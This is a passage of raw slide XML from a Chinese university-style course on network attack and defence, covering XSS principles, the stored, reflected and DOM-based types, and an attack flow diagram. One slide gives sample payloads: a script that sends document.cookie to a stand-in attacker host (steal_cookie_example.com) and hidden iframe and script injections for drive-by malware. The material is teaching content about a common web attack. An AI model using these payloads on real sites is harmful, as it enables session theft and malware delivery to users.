                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>：访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序的其他用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2919744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8001000" cy="747936"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本攻击技术原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="683568" y="1772816"/>
            <a:ext cx="7632848" cy="3456384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331640" y="5157192"/>
            <a:ext cx="2660015" cy="1142365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716016" y="5157192"/>
            <a:ext cx="2482850" cy="1143635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="821658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60648"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>查看用户终端会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>会话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>、甚至登录口令等敏感信息 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>窃取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>攻击者控制网站：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>steal_cookie_example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=‘http://steal_</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>cookie_example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>getcookie.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=’+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>target_link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" height=0 width=0&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> = "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>target_link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42503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88640"/>
            <a:ext cx="8001000" cy="675928"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>跨站脚本攻击类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>持久性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>漏洞形式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>应用程序允许用户输入内容并持久保存并显示在网页上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>攻击者通过利用跨站漏洞构建恶意脚本，对大量用户构成危害</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>典型案例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>留言本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>论坛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>博客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>/wiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>非持久性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>Non-Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>／</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t> reflected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>用户输入产生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>反馈给该用户，需结合社会工程学进行攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>DOM-based: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>本地生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>页面中存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Verdana" charset="0"/>
              <a:ea typeface="宋体" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3104343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8001000" cy="603920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>非持久性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 0" descr="图 12-14 非持久性XSS攻击过程.emz"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="1700808"/>
            <a:ext cx="7056784" cy="4536504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1522801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27530C09-0E29-C047-A6A0-EB424FBCF472}" type="datetime2">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>2022年10月24日</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5222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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>网络攻防技术与实践课程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200"/>
              <a:t>Copyright (c)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t> 2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>－</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>2009 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200"/>
              <a:t>诸葛建伟</a:t>
            </a:r>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2D79C7B2-E134-D44B-8808-27527EBDCF91}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52228" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="260648"/>
            <a:ext cx="8001000" cy="603920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Verdana" charset="0"/>
                <a:ea typeface="宋体" charset="0"/>
              </a:rPr>
              <a:t>跨站脚本攻击实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
